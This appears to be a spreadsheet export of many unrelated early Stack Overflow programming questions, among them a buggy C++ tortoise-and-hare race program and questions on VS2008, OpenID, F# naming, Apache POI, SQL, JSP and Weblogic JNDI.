&lt;p&gt;Here is my code in a .txt file:
&lt;a href="http://rapidshare.com/files/195742284/race.txt.html" rel="nofollow"&gt;http://rapidshare.com/files/195742284/race.txt.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;and here it is in a copy paste:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;cstdlib&amp;gt;
#include &amp;lt;ctime&amp;gt;
#include &amp;lt;iostream&amp;gt;
#include &amp;lt;string&amp;gt;
using namespace std;
class Race
{
        void main()
        {
                executeRace();
        }
        int randomMove()
        {
                srand(time(NULL));
                int randomInt = rand() % 100 + 1;
                return randomInt;
        }
        void executeRace()
        {
                int rabbitPosition = 1;
                int turtlePosition = 1;
                cout &amp;lt;&amp;lt; "BANG!!!" &amp;lt;&amp;lt; endl &amp;lt;&amp;lt; "AND THEY'RE OFF!!!";
                while (rabbitPosition &amp;lt;=70 &amp;amp;&amp;amp; turtlePosition &amp;lt;=70)
                {
                        printPositions(rabbitPosition, turtlePosition);
                        turtlePosition = turtleMoveSquares(turtlePosition);
                        rabbitPosition = rabbitMoveSquares(rabbitPosition);
                }
                printWinner(rabbitPosition, turtlePosition);
                tie(rabbitPosition, turtlePosition);
        }
        int turtleMoveSquares(int tPosition)
        {
                int turtleMove = randomMove();
                if(turtleMove &amp;gt;=1 &amp;amp;&amp;amp; turtleMove &amp;lt;= 40)
                        tPosition = tPosition + 4;
                if(turtleMove &amp;gt;= 41 &amp;amp;&amp;amp; turtleMove &amp;lt;= 50 )
                        tPosition = tPosition - 2;
                if(turtleMove &amp;gt;=51 &amp;amp;&amp;amp; turtleMove &amp;lt;=100)
                        tPosition = tPosition + 2;
                if(tPosition &amp;lt; 1)
                        tPosition = 1;
                return tPosition;
        }
        int rabbitMoveSquares(int rabbitPosition)
        {
                int rabbitMove = randomMove();
                if(rabbitMove &amp;gt;=1 &amp;amp;&amp;amp; rabbitMove &amp;lt;= 25)
                        rabbitPosition = rabbitPosition;
                if(rabbitMove &amp;gt;=26 &amp;amp;&amp;amp; rabbitMove &amp;lt;= 55)
                        rabbitPosition = rabbitPosition + 10;
                if(rabbitMove &amp;gt;=56 &amp;amp;&amp;amp; rabbitMove &amp;lt;=60)
                        rabbitPosition = rabbitPosition - 15;
                if(rabbitMove &amp;gt;=61 &amp;amp;&amp;amp; rabbitMove &amp;lt;= 90)
                        rabbitPosition = rabbitPosition + 5;
                if(rabbitMove &amp;gt;=90 &amp;amp;&amp;amp; rabbitMove &amp;lt;=100)
                        rabbitPosition = rabbitPosition - 3;
                if(rabbitPosition &amp;lt; 1)
                        rabbitPosition = 1;
                return rabbitPosition;
        }
        void printPositions(int rabbitPositions, int turtlePositions)
        {
                int turtleCount;
                int rabbitCount;
                int endCount;
                if(rabbitPositions == turtlePositions &amp;amp;&amp;amp; rabbitPositions != 1)
                {
                        turtleCount = 1;
                        while(turtleCount &amp;lt; turtlePositions)
                        {
                                cout &amp;lt;&amp;lt; "-";
                                turtleCount = turtleCount+1;
                        }
                        cout &amp;lt;&amp;lt; "OUCH!";
                }
                else
                {
                        turtleCount = 1;
                        rabbitCount = 1;
                        endCount=1;
                        if(turtlePositions &amp;lt; rabbitPositions)
                        {
                                while(turtleCount &amp;lt; turtlePositions)
                                {
                                        cout &amp;lt;&amp;lt;  "-";
                                                turtleCount = turtleCount+1;
                                }
                                cout &amp;lt;&amp;lt; "T";
                                while(rabbitCount &amp;lt; (rabbitPositions - turtlePositions))
                                {
                                        cout &amp;lt;&amp;lt;  "-";
                                        rabbitCount = rabbitCount+1;
                                }
                                cout &amp;lt;&amp;lt; "H";
                        }
                        if(rabbitPositions &amp;lt; turtlePositions)
                        {
                                while(rabbitCount &amp;lt; rabbitPositions)
                                {
                                        cout &amp;lt;&amp;lt; "-";
                                                rabbitCount = rabbitCount+1;
                                }
                                cout &amp;lt;&amp;lt; "H";
                                while(turtleCount &amp;lt; (turtlePositions - rabbitPositions))
                                {
                                        cout &amp;lt;&amp;lt; "-";
                                        turtleCount = turtleCount+1;
                                }
                                cout &amp;lt;&amp;lt; "T";
                                cout &amp;lt;&amp;lt; "\n";
                        }
                }
        }
        void printWinner(int rabbitPosition, int turtlePosition)
        {
                if(turtlePosition &amp;gt;= 70 &amp;amp;&amp;amp; rabbitPosition &amp;lt; 70)
                {
                        cout &amp;lt;&amp;lt; "TORTOISE WINS!!! YAY!!!\n";
                }
                else if(rabbitPosition &amp;gt;=70 &amp;amp;&amp;amp; turtlePosition &amp;lt; 70)
                {
                        cout &amp;lt;&amp;lt; "Hare wins. Yuch.\n";
                }
                else if(rabbitPosition &amp;gt;=70 &amp;amp;&amp;amp; turtlePosition &amp;gt;=70)
                {
                        cout &amp;lt;&amp;lt; "It's a tie\n";
                }
        }
        void tie(int turtlePosition, int rabbitPosition)
        {
                if(rabbitPosition &amp;gt;=70 &amp;amp;&amp;amp; turtlePosition &amp;gt;=70)
                        executeRace();
        }
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>VS2008 files and "start debugging"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This may sound like a newbie question - and it is. I'm relatively new to vs, we started using it a few months ago, and I still haven't "mentally" made the change from the command line. So, if you could help me with 2 things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;I create a new project (not a solution). He puts the files in some directory. After putting my code inside it, I click on the little green triangle (Debug, it says), and he compiles it, builds it and runs it. It works ok. Now, sometimes, I have to change only a tiny bit of code and I don't feel like getting the whole VS up just for that. How can I do that Debug thing from the command line, with the assumption I didn't change anything else.&lt;/li&gt;
&lt;li&gt;Where do I tell him not to create a "Debug" subdirectory, not to create a HTML Build log, an object file ... and so on, generally, where can I find the settings which will help me to get as little files ... apart from my original source, and the .exe resultant one ?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Best OpenId API for ASP.NET MVC application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing an ASP.NET MVC application and I want to use OpenId.&lt;/p&gt;
&lt;p&gt;What is the best option? &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;DotNetOpenId&lt;/li&gt;
&lt;li&gt;RPX&lt;/li&gt;
&lt;li&gt;Other???&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Does anyone know what StackOverflow uses? Is the Login UI custom-developed, or provided by an API/service?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>F# naming convention</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an "official" naming / casing convention for F#?&lt;/p&gt;
&lt;p&gt;I'm always in doubt of using C# style or not:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Class.MyFunctionName or Module.my_function_name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In F# you're meant to mix BCL classes and F# library ones: they have different casing and the code looks very ugly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XML Documentation: &lt;see&gt; tag with multiple generic type parameters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use XML documentation on the members of a class, and in a certain case I would like to reference a generic type using a  tag. The problem here is that a warning is generated when multiple generic type parameters are specified. It was easy enough to find how to reference a generic type with a single parameter, as such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;see cref="Func{int}" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, trying something like this generates the warning:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;see cref="Func{int, bool}" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems that I am either using the wrong syntax for references with more than one type parameter, or such references are not currently supported in XML docs for C#. Strangely enough, I can't seem to find any information about this on MSDN or in the Sandcastle docs (which I'm using to compile the documentation, and also complains about the syntax). Any clarification here would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Book recommendations: PHP/MySQL and Dreamweaver?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a book that discusses PHP, mySql and Dreamweaver as I have a project and i don't know either of these technologies, so i need something to give me a headstart.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Implement Closures Using SpiderMonkey API?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working with the SpiderMonkey C API and would like to implement a closure in C using their API. The one I would like to implement is fairly complex, but I can't even figure out how to do a simple one such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function x() {
   var i = 0;
   return function() { i++; print(i); };
}
var y = x();
y(); //1
y(); //2
y(); //3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was wondering if anyone knows how I might do this. I found the JS_NewFunction method, but I don't actually know if that is a step in the right direction. Any help will be appreciated, thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java POI - anyone been able to extract numbers from formula cells?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using Java POI for some time now, but have encountered a new problem, and I'm wondering if anyone has found a solution.&lt;/p&gt;
&lt;p&gt;When you read a spreadsheet, you need to know the type of cell in order to use the proper read method.&lt;/p&gt;
&lt;p&gt;So you get the cell type, then call the appropriate read method to get the cell's contents.&lt;/p&gt;
&lt;p&gt;This works for all cells except for the FORMULA cell, where the value is a number. If it's text, you can read it just fine. But if the resulting value is a number, then all you get from the cell is a blank string.&lt;/p&gt;
&lt;p&gt;I've been through the javadocs for POI, and am using the correct data type (HSSFRichTextString), but still no joy.&lt;/p&gt;
&lt;p&gt;Anyone have a solution?&lt;/p&gt;
&lt;p&gt;P.S. this behavior of POI does bug me as there should be a default cell.toString() method that would return the string representation of ANY cell type, say defaulting to the cell's value property. (sort of like the paste-special where you can choose "value").&lt;/p&gt;
&lt;p&gt;PPS: As asked - I'm using Java 6 (1.6.0_06) and poi-3.0.2-FINAL-20080204.jar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Selecting a date on a mobile web site</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a web site that includes creating appointments on the mobile site. I have to make it work on IE Mobile.&lt;/p&gt;
&lt;p&gt;The biggest challenge is to come up with a way to do date selection on a mobile site that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is compact enough to not take forever to load on the limited-bandwidth cell network.&lt;/li&gt;
&lt;li&gt;Will work on Windows Mobile 6 &lt;/li&gt;
&lt;li&gt;Prevents the user from inputing any values (free-form text box is out of the question)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The options I've come up with so far are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Drop-down lists for year, month, day (and client or server validation to ensure the validity of the selections, i.e. don't allow Feb. 31st)&lt;/li&gt;
&lt;li&gt;Use a jQuery plugin &amp;amp; hope jQuery can run on every device I'm targeting (IE Mobile, Blackberry, iPhone)&lt;/li&gt;
&lt;li&gt;Write some sort of elaborate IFrame AJAX lightbox that contains a basic calendar selector (that is, not reliant on jQuery), similar to what Google does on its mobile calendar site.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Since I can't seem to come up with any really solid ideas I wanted to see what the SO community could come up with as a decent solution for mobile date entry.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>help in reading nested xml using xmlreader in php</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
  &amp;lt;thing&amp;gt;
    &amp;lt;specs&amp;gt;
      &amp;lt;spec1 /&amp;gt;
      &amp;lt;spec3 /&amp;gt;
      &amp;lt;spec2 /&amp;gt;
    &amp;lt;/specs&amp;gt;
    &amp;lt;details /&amp;gt;
    &amp;lt;more_info&amp;gt;
      &amp;lt;info1 /&amp;gt;
      &amp;lt;info2 /&amp;gt;
    &amp;lt;/more_info&amp;gt;
  &amp;lt;/thing&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;
okeee so i got this sample xml and the problem is i cant seem to get the values of the innerxml, &lt;br&gt;when i use &lt;code&gt;$reader-&amp;gt;readInnerXML()&lt;/code&gt; it returns the whole string though im sure that my xml is valid&lt;br&gt;
what i wanted was to get the values of spec1, spec2, spec3 separately&lt;/p&gt;
&lt;p&gt;the code is pretty long so i posted it &lt;a href="http://pastebin.com/f48b9bd38" rel="nofollow"&gt;here&lt;/a&gt;
&lt;br&gt; i've been stuck with this for 3days now T_T poor me, i'd gladly accept any corrections&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to call Inline Table Function with output parameter from scalar function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know if it's possible to call a inline function with an output parameter from a scalar function?&lt;/p&gt;
&lt;p&gt;For example:
My inline function is called test_1(input parameter format bigint), the following example works great:&lt;br&gt;&lt;br&gt;
&lt;b&gt;SELECT     * FROM         MM.test_1(4679)&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;But now I would like to use it with an output parameter from a scalar function called dbo.test_2(output parameter format bigint) to make it more dynamically, but it don't works?&lt;br&gt;&lt;br&gt;
&lt;b&gt;SELECT     (SELECT * FROM MM.test_1(dbo.test_2(kp.id))) 
FROM         kp kp
WHERE     id = 4679&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;I receive the following error message:&lt;br&gt;&lt;b&gt; 
"Error in list of function arguments: '.' not recognized.
Incomplete parameters list.
Missing FROM clause.
Unable to parse query text."&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Any suggestions?&lt;/p&gt;
&lt;p&gt;Any help will be appreciated! &lt;/p&gt;
&lt;p&gt;Thx forward,
Best Regards Andreas&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Obtaining an IntialContext from Weblogic without using clear text password</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can obtain the Weblogic InitialContext from a JNDI Client using the following 
properties as the Environment parameters for InitialContext&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Hashtable jndiProps = new Hashtable();
jndiProps.put("java.naming.factory.initial", "t3://localhost:7001");
jndiProps.put("java.naming.provider.url", "weblogic.jndi.WLInitialContextFactory");
jndiProps.put("java.naming.security.principal", "weblogic");
jndiProps.put("java.naming.security.credentials", "weblogic");
InitialContext ctx = new InitialContext(jndiProps);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The question is, is there a way to obtain the InitialContext without specifying the security.credentials as cleartext but maybe as a hashed value?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>input and thread problem, python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing something like this in python&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyThread ( threading.Thread ):
    def run (s):
        try:
            s.wantQuit = 0
            while(not s.wantQuit):
                button = raw_input()
                if button == "q":
                    s.wantQuit=1
        except KeyboardInterrupt:
            s.wantQuit = 1
myThread = MyThread ()
myThread.start()
a=5
while not myThread.wantQuit:
    print "hey"
    if (a == 0):
        break;
    a = a-1;
    time.sleep(1)
#"""
sys.exit()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What happens is my app locks up for 5 seconds printing "hey" (5 times) THEN i get the raw_input dialog. How can i have the dialog show up so i can quit anytime instead of when my loop runs out?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read Cookies Using xcode in iphone app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My application needs to be able to read cookies stored by a page loaded in the UIWebView. I need to be able to read the cookies using xcode so that I can store some values in application settings.
Does anyone know if its possible to read cookies using xcode?
Your help is much appreciated.
Stuck on this for ages.
Tony &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Open source Application demonstrating layer Architcture</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Many of u  will agree that learning from open source project is another way of improving programming skills .Can me make list of open source applications that best demonstrates the use of layer architecture. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Type exists in two libraries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to incorporate &lt;a href="http://www.codeplex.com/linqtolucene" rel="nofollow"&gt;Linq to Lucene&lt;/a&gt; in my Asp.net-mvc project.&lt;br /&gt;
As with most web projects, I use the &lt;a href="http://www.squaredroot.com/post/2008/07/08/PagedList-Strikes-Back.aspx" rel="nofollow"&gt;PagedList&lt;/a&gt; type I put in my personal helper library and use it all over the place.&lt;br /&gt;
But so did Linq to Lucene...
Since both my library and the L2L library want to add the PagedList type to System.Collections.Generic namespace, I get a conflict message.&lt;/p&gt;
&lt;p&gt;Is there a way to resolve this conflict without either having to rewrite my projects or the L2L project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to deploy a Python application with libraries as source with no further dependencies?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Background&lt;/strong&gt;: I have a small Python application that makes life for developers releasing software in our company a bit easier. I build an executable for Windows using py2exe. The application as well as the binary are checked into Subversion. Distribution happens by people just checking out the directory from SVN. The program has about 6 different Python library dependencies (e.g. ElementTree, Mako)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The situation&lt;/strong&gt;: Developers want to hack on the source of this tool and then run it without having to build the binary. Currently this means that they need a python 2.6 interpreter (which is fine) and also have the 6 libraries installed locally using easy_install.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Problem&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;This is not a public, classical open source environment: I'm inside a corporate network, the tool will never leave the "walled garden" and we have seriously inconvenient barriers to getting to the outside internet (NTLM authenticating proxies and/or machines without direct internet access).&lt;/li&gt;
&lt;li&gt;I want the hurdles to starting to hack on this tool to be minimal: nobody should have to hunt for the right dependency in the right version, they should have to execute as little setup as possible. Optimally the prerequisites would be having a Python installation and just checking out the program from Subversion.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Anecdote&lt;/strong&gt;: The more self-contained the process is the easier it is to repeat it. I had my machine swapped out for a new one and went through the unpleasant process of having to reverse engineer the dependencies, reinstall distutils, hunting down the libraries online and getting them to install (see corporate internet restrictions above). &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best practice for developing a PHP data import framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;During our work as web developer for a meteorological company, we are faced with the same task over and over again: Get some files from somewhere (FTP/Web/directory/mail) and import the contained data to a database.&lt;/p&gt;
&lt;p&gt;Of course the file format is never the same, the databases are always designed differently, countless special cases have to be handled, etc, etc.&lt;/p&gt;
&lt;p&gt;So now I'm planning an importing framework for exactly this kind of work. Since we're all experienced PHP developers and the current scripts are either PHP or Perl, we'll stick with PHP as scripting language.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A data getter will fetch the file from the source, open it and store the content into a string variable. (Don't worry, PHP will get enough memory from us.)&lt;/li&gt;
&lt;li&gt;The data handler will do the complicated work to convert the string into some kind of array.&lt;/li&gt;
&lt;li&gt;The array will be saved to the database or written to a new file or whatever we're supposed to do with it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Along with this functionality there will be some common error handling, log writing and email reporting.&lt;/p&gt;
&lt;p&gt;The idea is to use a collection of classes (Some getter-classes, a lot of specialised handlers, some writer classes).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My question:&lt;/strong&gt; How do I practically organize these classes in a working script? Do I invent some kind of meta language which will be interpreted and the the classes are called accordingly? Or just provide some simple interfaces these classes have to implement and the my users (like I said: Experienced PHP developers) will write small PHP scripts loading these classes?&lt;/p&gt;
&lt;p&gt;The second version almost certainly offers the biggest flexiblity and extensibility. &lt;/p&gt;
&lt;p&gt;Do you have any other ideas concerning such an undertaking?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create a PFX file from a Java Keystore?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Java keystore (.jks file) holding a single certificate. How can I create a .pfx file from this keystore?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is a good desktop programming language to learn for a web developer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm want to learn a desktop programming language, preferably C, C++ or C#. I'm a PHP/HTML/CSS programmer and I would like to get into desktop applications. I need something pretty powerful and I would like to be able to create applications with Windows GUI's. &lt;/p&gt;
&lt;p&gt;What would the Stack Overflow community recommend? Is there any knowledge I should have before diving into these languages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is .NET already the right way to go for small app development?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a small windows app, but have some trouble deciding whether to use .NET or not. As a coder I would like to make use of the .NET libraries. On the other hand, requiring my users to download the gargantuan .NET runtime seems like a horrible decision.&lt;/p&gt;
&lt;p&gt;A 100 meg prerequisite might be alright for software in the scale of Visual Studio, but I feel like it would be a deal breaker for quick lightweight tools (think, for example, Notepad++). In the future, the .NET runtimes will likely become widespread enough to eradicate the problem, but in the short run, I feel uneasy.&lt;/p&gt;
&lt;p&gt;In your opinion/experience, is 2009 too early for a small app to go .NET? Should I wait for the bigger players to pave the way?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Edit: Which versions, if any, come by default with XP SP2 and Vista?&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calculate a Ratio in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought this would be simple, but searching Google didn't seem to help.&lt;/p&gt;
&lt;p&gt;I'm basically trying to write a function which will return a ratio as a string (eg 4:3) when supplies with two integers (eg 800 and 600).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string GetRatio(Int A, Int B) {
    // Code I'm looking for
    return Ratio;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Simply Div Opacity Fade on Focus using mootools</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a couple of divs in a page which hold simple HTML &amp;amp; images. The divs each have unique ids.&lt;/p&gt;
&lt;p&gt;I'd like it so that when the page loads the contents of the div are say, 60% but on mouseover the fade in at 100%. On mouseout they would go back to 60%.&lt;/p&gt;
&lt;p&gt;The site is built in &lt;strong&gt;Joomla 1.5.x&lt;/strong&gt; so already loads the &lt;strong&gt;mootools 1.11&lt;/strong&gt; library. I was looking for example code on the net and found lots of references for fading the opacity of images with jQuery but not all that much for mootools.&lt;/p&gt;
&lt;p&gt;Any pointers would be appreciated :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using the Euro symbol in JavaScript and PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I using the price in &lt;a href="http://en.wikipedia.org/wiki/Euro" rel="nofollow"&gt;Euro&lt;/a&gt; in JavaScript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var currency = '\u20AC';
Total Sum = Sum in Euro
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I try to use in PHP mail, the Euro symbol appears differently. I used the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$mail_body_reply=Sum from Javascript
mail($email, $subject_reply, $mail_body_reply, $header_reply);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is the way to make it act the same in PHP and JavaScript?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make 'always-on-bottom'-window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know how to make a 'always-on-bottom'-windows, or a window pinned to the desktop? It should receive focus and mouseclicks, but should stay at the bottom of the Z-order. It would also be great if it could stay on the desktop even when user do a minimize all or show desktop operation.&lt;/p&gt;
&lt;p&gt;Both delphi and c# solutions (or partial solutions/hints) would be great.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Query question related to retrieving the most recent entry from a table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi I'm not good in framing questions. I will try my best. I'm creating a website and my question is related to the queries related to the site.This is the current query that I have. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT
  GPS_modem.vehicle_no, 
  vehicle_log.longitude, 
  vehicle_log.latitude, 
  vehicle_log.timestamp
FROM
  vehicle_log,
  GPS_modem
WHERE
  GPS_modem.modem_ID = vehicle_log.modem_ID
ORDER BY 
  timestamp desc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want to display is the entry with the most recent timestamp from the &lt;code&gt;vehicle_log&lt;/code&gt; table where the &lt;code&gt;modem_ID&lt;/code&gt; from the &lt;code&gt;GPS_modem&lt;/code&gt; table matches with the &lt;code&gt;modem_ID&lt;/code&gt; from &lt;code&gt;vehicle_log&lt;/code&gt; table. &lt;/p&gt;
&lt;p&gt;I tried using &lt;code&gt;DISTINCT&lt;/code&gt; but I didn't work. I was getting errors when I tried using &lt;code&gt;MAX&lt;/code&gt; function. Hope you are able to understand my question, if then please help me. Thanking you in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to save the generated xml file using jsp?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have generated xml file using jsp,but i want the generated xml file should be saved as a file.
my code is&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
   &amp;lt;%@ page contentType="text/xml;charset=ISO-8859-1" %&amp;gt;
   &amp;lt;playlist version="1" xmlns = "http://xspf.org/ns/0/"&amp;gt;
   &amp;lt;title&amp;gt;My Band Rocks Your Socks&amp;lt;/title&amp;gt;
   &amp;lt;trackList&amp;gt;
   &amp;lt;%! String[] sports; %&amp;gt;
   &amp;lt;%
    sports = request.getParameterValues("sports");
    if (sports != null)
    { 
         for (int i = 0; i &amp;lt; sports.length; i++)
         { 
              // out.println (sports[i]); 
    	      String total=sports[i];
    	      String[] sa=total.split("[,]");
              // String[] sub=new String();
    	      out.print("&amp;lt;track&amp;gt;");
    	      for (int j=0;j&amp;lt;sa.length;j++)
              {
    	        // out.println(sa[j]);
                // out.println("sa["+j+"]="+sa[j]);
    	        if( j == 0)
    	        {
    		         out.print("&amp;lt;location&amp;gt;" + sa[0] +"&amp;lt;/location&amp;gt;"); 
    	        }
                else if (j == 1)
                     {
                        out.print("&amp;lt;image&amp;gt;" + sa[1] +"&amp;lt;/image&amp;gt;"); 
    				 }
                     else if( j==2)
                          {
                            out.print("&amp;lt;title&amp;gt;" + sa[2] +"&amp;lt;/title&amp;gt;");
    	                  }
               }// end of inner for loop()       
               out.print("&amp;lt;/track&amp;gt;");
         //out.println();
      }// end of outer for()
    } 
    //else out.println ("&amp;lt;b&amp;gt;none&amp;lt;b&amp;gt;");
  %&amp;gt;
  &amp;lt;/trackList&amp;gt;
 &amp;lt;/playlist&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is the format accepted by System.Net.Mail.MailAddress' parser?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on an app that's using &lt;a href="http://msdn.microsoft.com/en-us/library/system.net.mail.mailaddress.aspx" rel="nofollow"&gt;System.Net.Mail.MailAddress&lt;/a&gt; and friends for sending emails. Does that parser implement the full &lt;a href="http://www.ietf.org/rfc/rfc5322.txt" rel="nofollow"&gt;RFC5322&lt;/a&gt; or a subset or what? The MSDN is not very forthcoming on this topic.&lt;/p&gt;
&lt;p&gt;Any hints appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to format string in XAML Setter Value?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have learned how to format strings in the content attribute of a label like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Label Content="{Binding ElementName=theSlider, Path=Value}" 
   ContentStringFormat="The font size is {0}."/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to do the same thing in a Setter but "ValueStringFormat" doesn't exist, what is the correct syntax to do what I want to accomplish here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;DataTrigger Binding="{Binding Path=Kind}" Value="Task"&amp;gt;
    &amp;lt;Setter TargetName="TheTitle" Property="Text" 
       Value="{Binding Title}" 
       ValueStringFormat="Your title was: {0}"/&amp;gt;
&amp;lt;/DataTrigger&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Session state not updated when redirecting in explorer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an aspx page (page1.aspx) where I set a Session variable and then redirect to another page:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HttpContext.Current.Response.Redirect("page2.aspx");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On page2.aspx I want to read the session variable, but it doesn't exist until I reload the page. I try to read the session variable in page_load. &lt;/p&gt;
&lt;p&gt;The weird thing is that it works in firefox, but not in explorer??&lt;/p&gt;
&lt;p&gt;(Note that I've simplied this a bit to explain the problem page1.aspx is accessed from my HttpModule that and is rewritepathed (my workaround to get access to Session). So the flow is HttpModule -pathrewrite-&gt; page1.aspx (set session var) -redirect-&gt; page.2.aspx.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Subclassing a private (support) class in AVM2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing a dynamic mocking framework for Flex/AS3 and am having trouble with private/support types (ie. those declared outside the package {} in a class file).&lt;/p&gt;
&lt;p&gt;In my ABC "file", I am declaring the instance with the PROTECTED_NAMESPACE class flag and with a PRIVATE_NS multiname. I have also experimented with giving it the same namespace as the class it is subclassing (eg. PRIVATE_NS("ContainerClass.as$123")).&lt;/p&gt;
&lt;p&gt;No matter what I do, I always get the following error after loadBytes:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;VerifyError: Error #1014: Class ContainerClass.as$123::PrivateClass could not be found.&lt;/p&gt;
&lt;/blockquote&gt;
